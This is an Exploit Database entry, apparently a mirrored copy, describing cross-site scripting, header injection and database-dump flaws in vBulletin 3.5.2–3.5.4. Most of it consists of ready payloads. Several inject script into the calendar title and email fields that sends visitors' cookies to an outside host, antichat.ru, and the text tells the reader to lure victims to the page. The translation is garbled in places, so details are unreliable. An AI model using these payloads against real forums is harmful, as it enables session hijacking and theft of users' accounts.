vBulletin 3.5.2 – Cross-Site Scripting

• Exploit Database
• 17 阅读

• 作者： ROOT_EGY
  日期： 2010-02-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11394/

• # Title: vBulletin Version 3.5.2 - Introduction XSS scripting
  # Author: Discovered by ROOT_EGY
  # Version: vBulletin Version 3.5.2
  
  ===============================================
  WWW.sec-war.com
  ===============================================
  
  3.5.2 - Introduction XSS scripting
  The vulnerability is in the field «title» scenario «calendar.php».
  Example:
  TITLE :---> Test <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document.cookie; </ script>
  BODY :----> No matter
  OTHER OPTIONS: -> No matter
  That all went off to go to the calendar, create a new event in the header to prescribe <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document. cookie; </ script>, then go look at the link, which is our event and give to the show to someone who want to steal a cookie.
  3.5.3 - Introduction XSS scripts in the field «Email Address» in the module «Edit Email & Password».
  Example:
  
  www.server.som/forumpath/profile.php?do=editpassword
  pass: your pass
  email: vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ document.cookie; </ script> . nomatt
  Note About lenght limitation
  ****
  forum / profile.php? do = editoptions
  Receive Email from Other Members = yes
  ****
  www.server.com/forumpath/sendmessage.php?do=mailmember&u = (your id)
  In the email write vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ Document.cookie; </ script>. nomatt. Once preserved, it is important to make the option email visible to all. Then the helmet someone www.xhh777hhh.som/forumpath/sendmessage.php?do=mailmember&u = (your id) and get a cookie on our address sniffer.
  
  3.5.4 - Dump database
  The vulnerability is in the scripts directory upgrade_301.php 'install'.
  Example: server.com/forumpath/install/upgrade_301.php?step=SomeWord
  
  3.5.4 - Introduction XSS scripting
  The vulnerability is in the url parameter scenario inlinemod.php.
  Example: www.server.com/forumpath/inlinemod.php?do=clearthread&url=lala2% 0d% 0aContent-Length:% 2033% 0d% 0a% 0d% 0a <html> Hacked! </ Html>% 0d% 0a% 0d% 0a
  
  ===============================================
  
  ROOT_EGYto connect: r0t@hotmail.es
  
  ===============================================
  
  Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
  
  ===============================================